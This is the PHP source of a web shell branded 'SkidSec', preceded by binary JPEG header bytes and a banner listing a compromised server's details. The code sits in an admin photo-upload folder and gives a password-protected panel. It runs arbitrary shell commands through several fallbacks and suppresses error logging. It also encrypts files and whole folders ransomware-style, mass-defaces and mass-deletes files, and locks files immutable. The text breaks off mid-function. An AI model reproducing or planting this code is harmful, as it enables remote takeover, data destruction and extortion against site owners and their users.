JFIF   ( %!1!%)+...383,7(-.+  ++-+++++-++-++--+--+-+-------+-++-+--+---+++--+7+-+"F!1AQaq"2BRb#3Sr$CDsT&!Q1Aa"2Rbq ?򉄘ǷLR HR,nNb .&W)fJbMOYxj-\bT2(4CQ"qiC/ " %0Jl"e2V  0SDd2@TV^{cW&F͉x9#l,.XɳvRZ C8S 6ml!@!E! `FS!M #(d)Q lml1ml Ų&x(ʨ2NFmj@D<dN5UN˄uTB emLAy#` ` ` I!I 6āHBxL & J#7BQ.$hv h q+tC"EJ) 8R e2U2Y@j%6PF^4LnNBp"8)4JI-ֲvK ^؊)hz[T5˗",Rҥf8ڤS4ʘ!`D ` X+ L,(hl)*S##`6[`0*L T H*HA@I&&r1kr*r*)N$#L  1#ZFSl `[( ("((he`4 Ch [="A R / 0I`twCDcWh"i) cLad\BcLKHZ"ZEW$Ƚ@A~i^`S *A&h:+c Y6vϕGClRPs.`H`(@<$qDe pL@DpLX, E2MP A  `II m& AQ "AT rbg# g2!SiLj*3L \ G;TFL`K BMy 2S`YLh1 d >-"ZfD^Q DH" RAbEV#Lfq,(rETp64-IJ!*p4F$q;G8DQ/TKP2$jp3KW]FtLtƉ1ol]VBgػJH6 )h61GJR7Nj.Z4piJRDd]t]0dP]:N.b'⹙SvDSz]L,_#ugT&[~?cS^"{Bh{/=ۑxOk̳O59o dar793`)SeYM@\ "$E(Tm&)N2Ih)F5EDed(FS,Pa @!@#@lea HCD$11jCLJqcod S3yd*,lL+QEfsgW1nw)cT#dS HXkFJB"6(ʝH)H"#EZh:Y`khݳh%Sc<mlAko2]gDqQtro=3OƸU9_-t8UvW3sGəg*#:c)><"wc\ASmT|6Ę>9~#1Ƈ~ڒE1vVi# I MM#u$8W 5ǍfƬΜg*Qpi1ȩFOf۔S,/⎯(Lrմ`(Z LsbA \6 6dm[I=!r:REI.wgzG)ԇSbӑxuׇTyyL^e'x^ty4Z&eB]I|v59Jjhm;Ng񷫳n<ϞҼѝjk;׹DlY^ҍ\+x9V!j([cmS.NO6jxNζrm&oײizT$N>?~ Sl-:iڥk\at#E!CL`.O0a*w/WV7/r)DŽt7'Nĵ#7O1 ]{[/-2bA<$&Gm_4t)_>)mjG;V^'k59o>ɌM,ؾf9z6 4v_3T.5V/RD-5 %T5XTޫ4TaZ`U *ƱUƲ UG"5+sJJ2E9#܎kr2G3Bb,XM6H: ?@p!'\4V02aԙ) hbZ]:` ev3ʘ'}!ohȒ*TJjr[RFyQ*#{h{R]J]Lr-.D-.җfo$D ?X0%~1P.Og{cWϫ22&Ϭ_V.W3nmiOl}+!˫#`kR33aUb0-g:qmsέ+0HO|&nhOn+}n5QF_"gvLm/z'+r'n_oC语i|1}Gi|}_D~9JZ_%DVQp\koۅjAs~/c0ksUJi^W9W5!>?O:q|ˣSIB/&K<(lg(%Wg$|LW7vߤW߇q|jef3D H\S6(eJb*@&sTKTW/*@v:.N- @ITʓ1Zg&-eꓝM r]EMס{q$b]'7Z7N:O~lNlP7iͲk)$O^퉢<YSD*hr'Z#5e6t[Fdh AJǔP9P 1\R).Il+jI*,(ܢ22N*OwKFX gc?\mB7iA+εe8 "ġ/p5pW-$މ-[a 5ViAW/V{/&UsF./՞ҕ*)rZg.^_+gt_z-oAbqQn*WlHyZ*\TaEewlLR3ԹȭN}MM}aih"5ܕRT$:~'TcT|*)xGC>n+r{XU xuF"<~67у'fxlf`r3D*#Z1ђfH`2dIWo/qB| 63xxW6^m%Kvg>\>x>!H5Nr8J/FJ9Wx(Hou" S'kWاC\9ְ#^OaҮ+~gnkuЉ,aWU*1 읍jnb|e= :2.UL`Q}YS&gI.c=a`%j:C%2@^>])25/ܙ<lzwɛ)ݣS4h3=J tyϬ.E7 8ڞGZu\_JHsݢϑ}IZ"ӳ=X<Ɖ2{a:{7L+>V}c)*lo Yv&+|L;>+/Sj26K+澡*;>-s"}M2] Ig5aCL*r"&\} #^R.7_Mgf}.ߌy(}Z\gP&ʠHj%</{.]rߙQ`>;5g;u6dԛ %xb|oՋTJ5Ϥ(]XqP>f{Jk2,8'~ZU6tMQsg XKg^2ϓ3},[wo۴I|ܷ%[Ol\Pkr]Y//cg6U⧻/VПi8ys_n<\~cze!!H~x;QJZKȮ^ȧG|cS~8ji,Fo+,y~?pk)u /in3JmkX(Mj1N 4c Epc>BO *LfQO&` c;LjcYf 1ɻ)CLsY^Y5" lP/wuEln&dav,(;'W9ej ku`-KHI՟%ԁʁ 1\}?OjsF^Xn$Ё.օC>D:?I @aGE.ĩ1 $ et~T`߸Ir'RX.Zwc%~U=r>-UaFbǺ?R=Z?i'[ASS;siJrzy>nxu$[_B\4}:r'ҵj1_v-[;y?ֹ0I16 . M%4^!S&t ! h !zQð.bBT ?@]?CHq(rd!.$>/x+bnʎNN#w)` )*f!-ɂ\(طYLHzc`Uq7BfCcE0ԉ4Fم쏠ce5T r͸GVlФ?ѣ} mhrkly.Ts㷖)Mө S^%'g>wk%bP[}j~ǾV#K -Fgv켼ǨgɼeSz/6{M=BPZFu\Q75n3Iݤ.W9QfF{vJwF't[@iVj4G~KOnH߿_Do=.c.One?E+GfGN⧭H?4;u`ua|V-+j4?48n ɦ=-]puv&Jc}K>b%U x8pz6L8AXFsW]N55ҦbIWZQ7ï Ԗ3cjz匩ӺOTɖƴ%a'MI}cdR$ݚIζ̝ LIu>J3{^෠㜦˯xܿe\b"2y'x{ RDW b+o2KFhR0:U늞En>լRӉt Iڹ\ wշQEv"v;EJ)yl[5:F0=b4,\PqKtv4{bQz:>C7"8W#Zjdd| cjz%K %Z 9dD{=NFʳAƩtI)kS*s$`:A\ʬ*ֹ9{Nl|eJ١rQnM%z_#x_•TO><)kyD %GN<~y>vfǧB)F)c\lې(#\ h`fgfjTBdhhHL2Y0^ Y0^-"D!QaI15 m~ gՒd|;#gMn(P$l H.R2^PU")pN` N8󫅂OJ;^jz\uumJMF|ηq[]$Vrrt:Q^;QPkHՠ{]HwˆMuIr7!r&- j%"9LtUb56+^TWBqdhHAD7 HwKH^F3LIq #hK`]IWKiH?کǴeԥQ>g{^q^>HKoOB||8aݏS}{S_]ϸ/X~ܵw'OSPAf֩ܟ[>7 @[ֵ;G߇QU*Cթ *OKU^zz[fRnpcJX9u<iq8B]u8 ]I,;[G#2W.¸D8rPG Y%PBJ= wo;PJgx6;yB`3zZGPAͫy{5Nb_re*ONHR]Ji)U{Ӓ:qqɏ[mB4࢒I$ 2vpBADY`DIVAn"Bh$&&cMbdB 鮆wHR'E(ѸZA*H~{B M҅n\@N{7ISCp Vd( r+bg|ns:qg:|J|ɪV.UVaAS͓FyRuLѦT騬 `3􏳕{eo/Tz8DkW?,cl~TqLne֠[B*D +t 6˦S;5KjV3e WBrT.XSHm sl5F%NGM`Y )": J!W4]HTrPX2 QYɕ\m2VLd+`,^ѺiPztUGY6+cӧ6] U%u/ˈFOiB*nFF#ұJ Z/c')?Q͟5.8E~G6e<\?}GkhMFUظOqhEA - "`dQ#(4Ԧf VLmc@q5J8K; M^JZnn)9Zm\ qIJqS: i[9~Oaƒ]Z4F&+666( N]쁼LM(oyvUI/Χ[ھ]hTˉG".SeYgu;hRDtڬv=5 ׁqMS\Ȭi5D]1$*0UL1QY`QdLb[+z9";'yi`OT/4{@EZ'Y0>4I*d nM#5hі.vrM[]Ä;]\ʦS,叕DQZq0fӌI͋]TNK"#;?F;aURx_4WDm+F*0XJE@){ 1R-E2(@Qh l D rT.Q;[J;[`30`ɀ 2#=JeSsxRjG=`H rLJ@ Y$JaB2/x( "Id'6O0CI$:Ol+}I>[L|iK+]ZrH*2Aʶ uHRd)OrrbSx=5dmue1neܬ"e>Lw94勲u ҏ_4GuоJw]QtgSk(qW(6h|v= 1=P/\YZ|R>"*5W/ίR'o %R$5= .!VIRMf4*aR5nv% Usj:V Lj]Bn/TZ&.2„ܒBP)aYRʌW!#ErGf';tW$czI*\KI,c7Zc-ўj|p+-ђ{eg 2;R_{VLM]7sؒFmԻy853gҾqJG!E̤ӏqzs༿? U#R)ŧU(,>,&,-^e^۔.b EW^n<)\9.QeJuFiSh2"EL8yeCKQD\5R,D5.P]c1STt*ZFJ.T:N #%]M}khOe(͓iEMsɆ3( YF<"Ly^*[ry6.ɸm k݊iT%nM8 $Q#F# q 1*?% iS^4oܗ wWPS,aNޖxOxڽqp#F6&o,7LJuMΤK(Td{U Ƹf|q5U{3[FLNK6ӵQY5+'>Q3FSk).&:5z yZq/*q$d+Ge+$lO@Nڤy5eBvˌ䖥shS:JksgksF ꧸oi-FYxy9[Vȼĝ'_.[y2U*c?E+:TsWՀgOS> z75>ncߏ-Kz8ԋ,Ϧ70Z9_1h$Xiu10)0$+$! qsE4wRkh2*T.s%DH:`:=k.'WB{ ȮRGҷ7чVg)CHS}1ݍԳۂ<8g_4y*-Ml\]mZT)mJ~|k<6zWjf4'*u%RNRȉZA) .VLtp 4 V&mtJ#l˅;&{]8>TmhoLXOeD^_J>]jsSej﫦iOM SK([!Vc5zn-A@p]Ӄ \3kmK>#-sܧ?NLar@Js?…Xldny]݌E5•9.8hh69#7js׳R,'pqt:kgPhRԄ+ՕG9}="ֲ\kǁm R73pg$t3+o |o\]'ee5ɐ.7ѐ|ZعSF{qkx5-$Q h5*1yM$ 7)hJ2Kg`-hn*>)EYDIkBpȩAzfǪ>7O K#lߤg]:u~huُ۵u}(mjGIj܏6ES~/5CiRy|kVKGBޭ3;w /jꏈUu>iƪi:WRo'yr4C/?c:w!?\'?#Q:>u/?uEeuG*xY2)?־CAr*23_ץ}գk1%(_ _6aԗ _4 $ϗ+ϫɆzǾIgu?Y<#_xS>i\uɇ۽r}[ͫyRoWCC!H,iD։"Cj5 4] cTk2YZRBvRY~FqQt^RO-g"QP]Ih/t:ljs YӹqI] wqXp KV+8j} uu8PGP&zF:;8+ Sx9(. Q}:ƻWr,Ũ*'shfƧ-6__5,DH{* qp묘G MA}QRe{dyMucǨɾ7߈Avϩe͜jmUi p3\5,ާbf:o+7#ܾ~iU#up=}˄k{NV8m!ҌiptޜBvKi}!ש3UK)`igӞVMR'J[ky~g&6vǍ7ķ>uXd(3瓓[]QTTqnͮz1~_͓k俸0~Z1գ =18cL 5^lf^k^<ҲJɬcC-[^;J8j_q=WpeA_6 4.Ntc>Sv2Jf;G8. 5[,;ArSTˬmpmzjGe EoǩOgDWaGhz<|kT\$Q=u/ci˜S mN&Ok~'0,a} s + NC-G'(*>vw~&*wYG Ŷ K-L/$߮l/A/^:Z@X- Q-D2`@M2+w$Q"胊"47&+Dh'9Y* L7VhT+ -?K]Ik \Ϣgy) s v z)Z ˦2&ލ OjmG9@8F_u䊜r>3K%Yg-FFI]e+Kxkzװy"\Q4Ri'0+P=V&Sw3N/U|UEt*uS c M*tsBE 2ʃ@Kir(˫LRr璜Zy@].%NbXvz덟 hӰNMe#|g͒po9^licxB[e' {U? mlt%?霋ǒxZc X]ϗ15SeE{-Ӕi~DƯO|ë5a@G=%<ƧAs*+tzo, IpȔ|:X6J3Z5JXd]2 3%v*GvE@(S&SX7D0^{5t Z{ﮄsh- ]ɑqEV=^Ki9äBtI@&pEg*O<`F-}ǎ51H,<~qibQѓɳx#l$G9td1U+Sq%B[jOq+^ޏ7K >YY  $KK{*˝e"|$g"6v,,9.DaA,qэI~ܨ|kdv; hz2]x5{M5M~yלqTzUl9Mӏ.WVnkun !jzKO!v|& ;gۇ2BrI閵C tqHe[Zkގ=Q;OԶiᵞBcIU eN cOGz S__>.hNgG6).J$_Taѯ5^LqeB]O?A]H;ò{^0ٺuޚxB|:q'xu4"9Ο7k^eZ_fQOmzm̗{c3ٵKO|m*ek(8"yO(ٵ{LJb2Ǩkgg1_/qrDՆ[_l\ I~Bsc/x ),,̿@PFޞ>O)<<=5m=^x6}~6qoYGޣiY{uN+<,CǚwVxe~c!,5R4u/9In=G•^PF6ɼM򿶤$"\|78ؖYU cXFOKc4s-=6O<;.ϴ޶$q>e? qY}StirX?e/&R'ʑ[ѯMi{?8\g^>\!-VZCf.ȾzRWMh_{^H)mz}V%չM.EJUz7z>ZW6\BW~:W3!S_4~m ǚ! ;VeGKFڵ858Buj:ZZ(/H׭eav!$gpLV)țAJO~YBꤞ厅XJdjg{hR9~_f '5U+}W5%ZjzgTtozYD @%JK\qymeЪKIIp"xoz\B1$G)8Ԅ Jeyc".yyVBR-%BEA-k^Luj cYwԄ%X!e-4ZRḡlJvYsB԰˗0?RM\TlaߏVu4BmY!UyYylgd!m2$i=[hN,6)_~7͖CDF2zÕ{?l;Hܲk׋!/XAłrCXEI{]P[e! ?%Ktqܱ5! jַĞ*TvAG)fuxTҖV7~ 4=r! ob%jTwU$Bnqed䤿@0P&V]HJ)^YrޯĿbsY8=1! n}UD*7uƫi~!s[W{V9J;~Ӯ|[3s۷dڔIj?qJ'O,IkE]G(5\ۖ7)-g,ŶǗ=~e>k쐁%(g˦o[fxN_baGBm:܆VGЗ,G_D!/og,ҢVܤ_iS_~@ SkidSec Webshell

SkidSec WebShell

Server Address : 172.31.38.4

Web Server : Apache/2.4.58 (Ubuntu)

Uname : Linux ip-172-31-38-4 6.14.0-1017-aws #17~24.04.1-Ubuntu SMP Wed Nov 5 10:48:17 UTC 2025 x86_64

PHP Version : 7.4.33



Current Path : /var/www/html/admin/pmi_model_photo/



Current File : /var/www/html/admin/pmi_model_photo/test.php
<?php
$SHELL_NAME = "SERVER";
$LOGIN_USER = "cyren";
$LOGIN_PASS = "pogi";
$SESSION_TIMEOUT = 3600;
$DEFAULT_DIR = __DIR__;
$PHP_VERSION = phpversion();

error_reporting(0);
ini_set('display_errors', 0);
ini_set('log_errors', 0);

if (!function_exists('array_key_first')) {
    function array_key_first($array) {
        if (!is_array($array) || empty($array)) return null;
        reset($array);
        return key($array);
    }
}

if (!function_exists('openssl_random_pseudo_bytes')) {
    function openssl_random_pseudo_bytes($length, &$crypto_strong = null) {
        $bytes = '';
        for ($i = 0; $i < $length; $i++) {
            $bytes .= chr(mt_rand(0, 255));
        }
        $crypto_strong = true;
        return $bytes;
    }
}

@session_start();
if (!isset($_SESSION)) {
    $_SESSION = array();
}

if (!isset($_GET['result']) && !isset($_POST['action'])) {
    if (isset($_SESSION['last_result'])) unset($_SESSION['last_result']);
    if (isset($_SESSION['last_type'])) unset($_SESSION['last_type']);
    if (isset($_SESSION['last_details'])) unset($_SESSION['last_details']);
}

if (!isset($_SESSION['login_time']) || (time() - $_SESSION['login_time']) > $SESSION_TIMEOUT) {
    if (isset($_SESSION['authenticated'])) unset($_SESSION['authenticated']);
    if (isset($_SESSION['current_dir'])) unset($_SESSION['current_dir']);
}

if (isset($_GET['logout'])) {
    session_destroy();
    header('Location: ?');
    exit;
}

if (!isset($_SESSION['authenticated']) || $_SESSION['authenticated'] !== true) {
    if (isset($_POST['login_user']) && isset($_POST['login_pass'])) {
        if ($_POST['login_user'] === $LOGIN_USER && $_POST['login_pass'] === $LOGIN_PASS) {
            $_SESSION['authenticated'] = true;
            $_SESSION['login_time'] = time();
            $_SESSION['current_dir'] = $DEFAULT_DIR;
            $_SESSION['tab'] = 'filemanager';
        }
    }
    
    if (!isset($_SESSION['authenticated']) || $_SESSION['authenticated'] !== true) {
        echo '<!DOCTYPE html><html><head><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><style>
        * {margin:0;padding:0;box-sizing:border-box;}
        body {font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;background:#0f0f0f;min-height:100vh;display:flex;align-items:center;justify-content:center;padding:20px;}
        .login-container {width:100%;max-width:400px;}
        .login-box {background:#1a1a1a;border-radius:16px;padding:40px 30px;border:1px solid #333;box-shadow:0 20px 60px rgba(0,0,0,0.5);}
        .login-title {color:#fff;text-align:center;font-size:28px;font-weight:800;margin-bottom:30px;letter-spacing:-0.5px;background:linear-gradient(135deg, #667eea 0%, #764ba2 100%);-webkit-background-clip:text;-webkit-text-fill-color:transparent;background-clip:text;}
        .input-group {margin-bottom:20px;}
        .input-group input {width:100%;padding:16px 20px;border:none;border-radius:10px;background:#2d2d2d;color:#fff;font-size:16px;transition:all 0.3s;border:2px solid #444;}
        .input-group input:focus {outline:none;border-color:#667eea;background:#333;}
        .input-group input::placeholder {color:#888;}
        .login-btn {width:100%;padding:18px;background:linear-gradient(135deg,#667eea 0%,#764ba2 100%);border:none;border-radius:10px;color:#fff;font-size:18px;font-weight:700;cursor:pointer;transition:all 0.3s;margin-top:10px;}
        .login-btn:hover {transform:translateY(-2px);box-shadow:0 10px 25px rgba(102,126,234,0.4);}
        @media (max-width:480px) {.login-box {padding:30px 20px;} .login-title {font-size:24px;}}
        </style></head><body><div class="login-container"><div class="login-box">
        <div class="login-title">'.$SHELL_NAME.'</div>
        <form method="POST"><div class="input-group"><input type="text" name="login_user" placeholder="Username" required autocomplete="off"></div>
        <div class="input-group"><input type="password" name="login_pass" placeholder="Password" required autocomplete="off"></div>
        <button type="submit" class="login-btn">ACCESS SHELL</button></form></div></div></body></html>';
        exit();
    }
}

if (isset($_GET['cwd']) && @is_dir($_GET['cwd'])) {
    $realpath = @realpath($_GET['cwd']);
    if ($realpath) $_SESSION['current_dir'] = $realpath;
}

if (!isset($_SESSION['current_dir']) || !@is_dir($_SESSION['current_dir'])) {
    $_SESSION['current_dir'] = $DEFAULT_DIR;
}

$current_dir = isset($_SESSION['current_dir']) ? $_SESSION['current_dir'] : $DEFAULT_DIR;
$mass_deface_count = 0;
$deface_result = '';

$command_output = '';
$terminal_cwd = $current_dir;

if (isset($_POST['terminal_command']) && isset($_POST['current_tab']) && $_POST['current_tab'] === 'terminal') {
    $cmd = trim($_POST['terminal_command']);
    $output_buffer = '';
    
    if (!empty($cmd)) {
        $old_cwd = @getcwd();
        
        if (preg_match('/^\s*cd\s+(.+)$/', $cmd, $matches)) {
            $new_dir = trim($matches[1], " \t\n\r\0\x0B\"'");
            
            if ($new_dir === '..') {
                $new_dir = dirname($current_dir);
            } elseif ($new_dir === '~' || $new_dir === '' || $new_dir === '/') {
                $new_dir = $DEFAULT_DIR;
            } elseif ($new_dir[0] !== '/') {
                $new_dir = $current_dir . '/' . $new_dir;
            }
            
            $new_dir = @realpath($new_dir);
            if ($new_dir && @is_dir($new_dir)) {
                $_SESSION['current_dir'] = $new_dir;
                $current_dir = $new_dir;
                $output_buffer = "Changed directory to: $new_dir\n";
            } else {
                $output_buffer = "cd: $new_dir: No such directory\n";
            }
        } else {
            @set_time_limit(30);
            @chdir($current_dir);
            
            $output = '';
            
            if (function_exists('shell_exec')) {
                $output = @shell_exec($cmd . " 2>&1");
                if ($output !== null) $output_buffer = $output;
            }
            
            if (empty($output_buffer) && function_exists('exec')) {
                @exec($cmd . " 2>&1", $exec_output, $return_var);
                $output_buffer = implode("\n", $exec_output);
                if ($return_var !== 0) $output_buffer .= "\n[Exit code: $return_var]";
            }
            
            if (empty($output_buffer) && function_exists('passthru')) {
                ob_start();
                @passthru($cmd . " 2>&1", $passthru_return);
                $output_buffer = ob_get_clean();
                if ($passthru_return !== 0) $output_buffer .= "\n[Exit code: $passthru_return]";
            }
            
            if (empty($output_buffer) && function_exists('system')) {
                ob_start();
                @system($cmd . " 2>&1", $system_return);
                $output_buffer = ob_get_clean();
                if ($system_return !== 0) $output_buffer .= "\n[Exit code: $system_return]";
            }
            
            if (empty($output_buffer)) {
                ob_start();
                echo `$cmd 2>&1`;
                $output_buffer = ob_get_clean();
            }
            
            if (empty($output_buffer)) {
                $output_buffer = "Command execution failed or returned no output.\n";
            }
        }
        
        $_SESSION['terminal_output'] = $output_buffer;
        $_SESSION['last_command'] = $cmd;
        
        header("Location: ?cwd=" . urlencode($current_dir) . "&result=1");
        exit();
    }
}

$command_output = isset($_SESSION['terminal_output']) ? $_SESSION['terminal_output'] : '';
$last_command = isset($_SESSION['last_command']) ? $_SESSION['last_command'] : '';

define('ENCRYPTION_MAGIC', 'ENCRYPTEDv1.0');

function isFileEncrypted($filepath) {
    if (!@is_file($filepath) || !@is_readable($filepath)) {
        return false;
    }
    
    $handle = @fopen($filepath, 'rb');
    if (!$handle) return false;
    
    $signature = @fread($handle, strlen(ENCRYPTION_MAGIC));
    @fclose($handle);
    return $signature === ENCRYPTION_MAGIC;
}

function encryptFile($filepath, $password) {
    if (!@is_file($filepath) || !@is_readable($filepath) || !@is_writable($filepath)) {
        return array('success' => false, 'message' => 'File access denied');
    }
    
    if (isFileEncrypted($filepath)) {
        return array('success' => false, 'message' => 'File already encrypted');
    }
    
    $data = @file_get_contents($filepath);
    if ($data === false) {
        return array('success' => false, 'message' => 'Cannot read file');
    }
    
    if (!function_exists('openssl_encrypt') || !function_exists('hash_pbkdf2')) {
        return array('success' => false, 'message' => 'OpenSSL and PBKDF2 required for encryption');
    }
    
    try {
        $salt = openssl_random_pseudo_bytes(16);
        $iv = openssl_random_pseudo_bytes(16);
        
        $key = hash_pbkdf2('sha256', $password, $salt, 10000, 32, true);
        
        $encrypted = openssl_encrypt($data, 'aes-256-gcm', $key, OPENSSL_RAW_DATA, $iv, $tag);
        
        if ($encrypted === false) {
            return array('success' => false, 'message' => 'Encryption failed - OpenSSL error');
        }
        
        $version = pack('V', 1);
        $result = ENCRYPTION_MAGIC . $version . $salt . $iv . $tag . $encrypted;
        
        if (@file_put_contents($filepath, $result, LOCK_EX) !== false) {
            return array('success' => true, 'message' => 'File encrypted successfully');
        }
        
        return array('success' => false, 'message' => 'Failed to write encrypted file');
        
    } catch (Exception $e) {
        return array('success' => false, 'message' => 'Exception: ' . $e->getMessage());
    }
}

function decryptFile($filepath, $password) {
    if (!@is_file($filepath) || !@is_readable($filepath) || !@is_writable($filepath)) {
        return array('success' => false, 'message' => 'File access denied');
    }
    
    if (!isFileEncrypted($filepath)) {
        return array('success' => false, 'message' => 'File not encrypted');
    }
    
    $data = @file_get_contents($filepath);
    if ($data === false) {
        return array('success' => false, 'message' => 'Cannot read file');
    }
    
    if (strlen($data) < 80) {
        return array('success' => false, 'message' => 'Invalid encrypted file format');
    }
    
    if (!function_exists('openssl_decrypt') || !function_exists('hash_pbkdf2')) {
        return array('success' => false, 'message' => 'OpenSSL and PBKDF2 required for decryption');
    }
    
    try {
        $offset = strlen(ENCRYPTION_MAGIC);
        $version = unpack('V', substr($data, $offset, 4))[1];
        $offset += 4;
        
        if ($version != 1) {
            return array('success' => false, 'message' => 'Unsupported encryption version');
        }
        
        $salt = substr($data, $offset, 16);
        $iv = substr($data, $offset + 16, 16);
        $tag = substr($data, $offset + 32, 16);
        $encrypted = substr($data, $offset + 48);
        
        $key = hash_pbkdf2('sha256', $password, $salt, 10000, 32, true);
        
        $decrypted = openssl_decrypt($encrypted, 'aes-256-gcm', $key, OPENSSL_RAW_DATA, $iv, $tag);
        
        if ($decrypted === false) {
            return array('success' => false, 'message' => 'Decryption failed - wrong password or corrupted file');
        }
        
        if (@file_put_contents($filepath, $decrypted, LOCK_EX) !== false) {
            return array('success' => true, 'message' => 'File decrypted successfully');
        }
        
        return array('success' => false, 'message' => 'Failed to write decrypted file');
        
    } catch (Exception $e) {
        return array('success' => false, 'message' => 'Exception: ' . $e->getMessage());
    }
}

function encryptDirectory($dir, $password) {
    if (!@is_dir($dir) || !@is_readable($dir)) {
        return array('success' => false, 'message' => 'Directory not readable or does not exist');
    }
    
    $success_count = 0;
    $fail_count = 0;
    $failed_files = array();
    
    try {
        $items = @scandir($dir);
        if ($items === false) {
            return array('success' => false, 'message' => 'Cannot read directory');
        }
        
        foreach ($items as $item) {
            if ($item == '.' || $item == '..') continue;
            
            $path = $dir . '/' . $item;
            if (@is_file($path) && @is_readable($path) && @is_writable($path)) {
                $result = encryptFile($path, $password);
                if ($result['success']) $success_count++; else $fail_count++;
            }
        }
        
        return array(
            'success' => true, 
            'message' => "Encrypted $success_count files, failed: $fail_count",
            'failed_files' => $failed_files,
            'success_count' => $success_count,
            'fail_count' => $fail_count
        );
    } catch (Exception $e) {
        return array('success' => false, 'message' => 'Exception: ' . $e->getMessage());
    }
}

function decryptDirectory($dir, $password) {
    if (!@is_dir($dir) || !@is_readable($dir)) {
        return array('success' => false, 'message' => 'Directory not readable or does not exist');
    }
    
    $success_count = 0;
    $fail_count = 0;
    $failed_files = array();
    
    try {
        $items = @scandir($dir);
        if ($items === false) {
            return array('success' => false, 'message' => 'Cannot read directory');
        }
        
        foreach ($items as $item) {
            if ($item == '.' || $item == '..') continue;
            
            $path = $dir . '/' . $item;
            if (@is_file($path) && @is_readable($path) && @is_writable($path)) {
                $result = decryptFile($path, $password);
                if ($result['success']) $success_count++; else $fail_count++;
            }
        }
        
        return array(
            'success' => true, 
            'message' => "Decrypted $success_count files, failed: $fail_count",
            'failed_files' => $failed_files,
            'success_count' => $success_count,
            'fail_count' => $fail_count
        );
    } catch (Exception $e) {
        return array('success' => false, 'message' => 'Exception: ' . $e->getMessage());
    }
}

function massDeface($start_dir, $extensions, $deface_content, &$count = 0) {
    if (!@is_dir($start_dir) || !@is_readable($start_dir)) {
        return array('success' => false, 'message' => 'Directory not readable or does not exist');
    }
    
    $success_count = 0;
    $fail_count = 0;
    $failed_files = array();
    
    try {
        $iterator = new RecursiveIteratorIterator(
            new RecursiveDirectoryIterator($start_dir, RecursiveDirectoryIterator::SKIP_DOTS),
            RecursiveIteratorIterator::SELF_FIRST
        );
        
        foreach ($iterator as $file) {
            if ($file->isFile() && $file->isReadable() && $file->isWritable()) {
                $ext = strtolower(pathinfo($file->getFilename(), PATHINFO_EXTENSION));
                if (in_array($ext, $extensions)) {
                    if (@file_put_contents($file->getRealPath(), $deface_content) !== false) {
                        $success_count++;
                    } else {
                        $fail_count++;
                    }
                }
            }
        }
        
        $count = $success_count;
        
        return array(
            'success' => true, 
            'message' => "Defaced $success_count files, failed: $fail_count",
            'failed_files' => $failed_files,
            'success_count' => $success_count,
            'fail_count' => $fail_count
        );
    } catch (Exception $e) {
        return array('success' => false, 'message' => 'Exception: ' . $e->getMessage());
    }
}

function safeChmod($path, $mode) {
    if (!file_exists($path)) {
        return array('success' => false, 'message' => 'File/directory does not exist');
    }
    
    if (!preg_match('/^[0-7]{3,4}$/', $mode)) {
        return array('success' => false, 'message' => 'Invalid permission format. Use 3-4 digits (e.g., 755, 0644)');
    }
    
    $mode_octal = octdec($mode);
    $current_perms = @fileperms($path);
    $current_octal = $current_perms & 0777;
    
    if (@chmod($path, $mode_octal)) {
        clearstatcache(true, $path);
        $new_perms = @fileperms($path) & 0777;
        
        if ($new_perms == $mode_octal) {
            return array(
                'success' => true, 
                'message' => "Permissions changed from " . decoct($current_octal) . " to $mode",
                'old_perms' => decoct($current_octal),
                'new_perms' => $mode
            );
        } else {
            return array(
                'success' => false, 
                'message' => "Failed to verify permission change. Server may have restrictions.",
                'old_perms' => decoct($current_octal),
                'new_perms' => decoct($new_perms)
            );
        }
    } else {
        return array(
            'success' => false, 
            'message' => 'Failed to change permissions. Server restriction or insufficient privileges.',
            'old_perms' => decoct($current_octal)
        );
    }
}

function lockFilePermissions($path, $mode = '0444') {
    if (!file_exists($path)) {
        return array('success' => false, 'message' => 'File/directory does not exist');
    }
    
    $result = safeChmod($path, $mode);
    
    if ($result['success']) {
        if (function_exists('shell_exec') && strtoupper(substr(PHP_OS, 0, 3)) !== 'WIN') {
            @shell_exec("chattr +i " . escapeshellarg($path) . " 2>/dev/null");
        }
        
        if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
            @shell_exec('attrib +R "' . $path . '"');
        }
        
        return array(
            'success' => true,
            'message' => "File locked with permissions $mode and additional protection applied",
            'permissions' => $mode
        );
    }
    
    return $result;
}

function deleteDirectory($dir) {
    if (!@is_dir($dir)) return false;
    
    $files = @array_diff(@scandir($dir), array('.', '..'));
    foreach ($files as $file) {
        $path = $dir . '/' . $file;
        if (@is_dir($path)) {
            deleteDirectory($path);
        } else {
            @unlink($path);
        }
    }
    return @rmdir($dir);
}

function formatBytes($bytes, $precision = 2) {
    $units = array('B', 'KB', 'MB', 'GB', 'TB');
    $bytes = max($bytes, 0);
    $pow = floor(($bytes ? log($bytes) : 0) / log(1024));
    $pow = min($pow, count($units) - 1);
    $bytes /= pow(1024, $pow);
    return round($bytes, $precision) . ' ' . $units[$pow];
}

$operation_result = '';
$operation_type = '';
$operation_details = '';
$show_notification = false;

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action'])) {
    $action = $_POST['action'];
    $show_notification = true;
    
    $mass_actions = array('mass_delete', 'mass_encrypt', 'mass_decrypt', 'zip_selected');
    
    if (in_array($action, $mass_actions)) {
        switch ($action) {
            case 'mass_delete':
                if (isset($_POST['selected_items'])) {
                    $count = 0;
                    $failed = 0;
                    foreach ($_POST['selected_items'] as $item) {
                        $item = urldecode($item);
                        if (@is_dir($item)) {
                            if (deleteDirectory($item)) $count++; else $failed++;
                        } elseif (@is_file($item)) {
                            if (@unlink($item)) $count++; else $failed++;
                        }
                    }
                    $_SESSION['last_result'] = "Deleted $count items, failed: $failed";
                    $_SESSION['last_type'] = $count > 0 ? 'success' : 'error';
                }
                break;
                
            case 'mass_encrypt':
                if (isset($_POST['selected_items'], $_POST['mass_encrypt_password'])) {
                    $success_count = 0;
                    $fail_count = 0;
                    foreach ($_POST['selected_items'] as $item) {
                        $item = urldecode($item);
                        if (@is_dir($item)) {
                            $result = encryptDirectory($item, $_POST['mass_encrypt_password']);
                        } elseif (@is_file($item)) {
                            $result = encryptFile($item, $_POST['mass_encrypt_password']);
                        } else {
                            $result = array('success' => false);
                        }
                        if ($result['success']) $success_count++; else $fail_count++;
                    }
                    $_SESSION['last_result'] = "Mass Encryption: $success_count items encrypted, $fail_count failed";
                    $_SESSION['last_type'] = $success_count > 0 ? 'success' : 'error';
                }
